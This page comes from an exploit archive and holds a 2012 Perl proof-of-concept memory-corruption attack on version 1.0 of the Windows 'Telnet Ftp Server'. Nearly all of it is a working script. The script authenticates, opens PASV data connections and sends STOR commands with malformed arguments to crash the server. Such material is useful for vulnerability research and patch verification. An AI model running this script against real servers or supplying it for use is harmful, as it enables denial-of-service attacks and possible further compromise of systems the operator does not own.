Telnet Ftp Server <= Memory Corruption PoC



EKU-ID: 2456 CVE: OSVDB-ID:
Author: coolkaveh Published: 2012-07-16 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Telnet Ftp Server <= Memory Corruption PoC
# crash:http://img40.imageshack.us/img40/595/ftpqm.jpg
# Date: July 7, 2012
# Author: coolkaveh
# coolkaveh@rocketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.slimbyte.sufx.net/
# also download link available at : http://telnet-ftp-server.en.softonic.com/
# Version: 1.0  build(1.218)
# Tested on: windows 7 SP1
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Crappy Telnet Ftp Server Memory Corruption PoC
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl -w
use IO::Socket;
use Thread;
$|=1;
$host=shift;
$port=shift || "21";
if(!defined($host)){
 print("usage: $0 \$host [\$port]\n");
 exit(0);
}
$check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
if(defined $check_first){
 print "$host -> $port is alive.\n";
 $check_first->close;
}else{
 die("$host -> $port is closed!\n");
}
@bf1=(
'A'x5,
);
@bf2=(
'!)!)',
);
@bf3=(
'0',
);
@t=@bf1;
push(@t, @bf2);
push(@t, @bf3);
sub check(){
 #Thread->self->detach;
 $sock=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
 if(defined $sock){
  #print "$host -> $port is alive.\n";
  undef($content_tmp);
  $sock->recv($content_tmp,100,0);
  if(length($content_tmp)>0){
   $sock->close;
   return 1;
  }else{
   $sock->close;
   return 0;
  }
 }else{
  #print("$host -> $port is closed!\n");
  return 0;
 }
}
#set PASV Mode send Socket
sub send_sock($){
 $send_port_num=shift;
 Thread->self->detach;
 $send_sock_tmp=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$send_port_num, Proto=>'tcp', Timeout=>30);
 if(defined($send_sock_tmp)){
  $send_sock_tmp->recv($mem,100,0);
  print "$mem\n";
  $mem=0;
  $send_sock_tmp->close;
  undef($send_port_num);
  return 1;
 }else{
  undef($send_port_num);
  return 0;
 }
}
print "Please enter the real username: ";
$real_username=<STDIN>;
chop($real_username);
print "Please enter the real password: ";
$real_password=<STDIN>;
chop($real_password);
@cm=(
'STOR',
'STOR',    
);
$sock3=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30);
if(defined($sock3)){
 $sock3->recv($content, 100, 0);
 print "$content\n";
 sleep(2);
 $sock3->send("USER "."$real_username\r\n", 0);
 sleep(2);
 $sock3->recv($content, 100, 0);
 print "$content\n";
 sleep(2);
 $sock3->send("PASS "."$real_password\r\n", 0);
 sleep(2);
 $sock3->recv($content, 100, 0);
 print "$content\n";
 sleep(2);
 if($content=~m/^230/){
  $sock3->close;
 }else{
  $sock3->close;
  die("Username or Password is wrong!\n");
 }
}else{
 die "$host -> $port is closed!\n";
}
L_V_J: undef($cmd);
C_L: foreach $cmd (@cm){
 foreach $poc (@t){
  LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30);
  if(defined($sock4)){
   $sock4->recv($content, 100, 0);
   print "$content\n";
   sleep(2);
   $sock4->send("USER "."$real_username\r\n", 0);
   sleep(2);
   $sock4->recv($content, 100, 0);
   print "$content\n";
   sleep(2);
   $sock4->send("PASS "."$real_password\r\n", 0);
   sleep(2);
   $sock4->recv($content, 100, 0);
   print "$content\n";
   sleep(2);
   if(($cmd eq 'STOR')){
    $sock4->send("PASV\r\n", 0);
    sleep(2);
    $sock4->recv($content, 100, 0);
    print "$content\n";
    sleep(2);
    if($content=~m/\((.*),(.*),(.*),(.*),(.*),(.*)\)/){
     $send_port=$5*256+$6;
    }
    }
   }
   $sock4->send("$cmd"." "."$poc\r\n", 0);
  Thread->new(\&send_sock,$send_port);
   $sock4->send("$cmd"." "."$poc\r\n", 0);
   sleep(2);
   $sock4->recv($content, 100, 0);
   $thread3=Thread->new(\&check);
   undef($thread3);
   $sock4->send("QUIT\r\n", 0);
   }
    }